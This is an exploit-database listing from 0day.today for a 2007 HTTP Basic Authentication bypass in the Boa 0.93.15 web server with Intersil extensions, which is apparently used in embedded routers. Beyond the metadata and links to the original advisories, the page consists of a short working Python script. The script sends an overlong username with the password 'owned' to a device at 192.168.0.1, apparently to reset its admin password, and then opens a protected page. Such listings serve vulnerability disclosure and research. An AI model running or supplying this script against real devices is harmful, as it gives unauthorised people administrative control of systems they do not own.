[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Boa 0.93.15 HTTP Basic Authentication Bypass Exploit

Author
ikki
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9060
Category
remote exploits
Date add
15-10-2007
Platform
linux
====================================================
Boa 0.93.15 HTTP Basic Authentication Bypass Exploit
====================================================



/*
 * Boa HTTP Basic Authentication Bypass 
 * Vuln: Boa/0.93.15 (with Intersil Extensions)
 *
 * Original Advisory: 
 * http://www.securityfocus.com/archive/1/479434
 * http://www.ikkisoft.com/stuff/SN-2007-02.txt
 *
 *  Luca "ikki" Carettoni
 *  http://www.ikkisoft.com
 */

----

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME 
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', 
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')



#  0day.today [2024-12-25]  #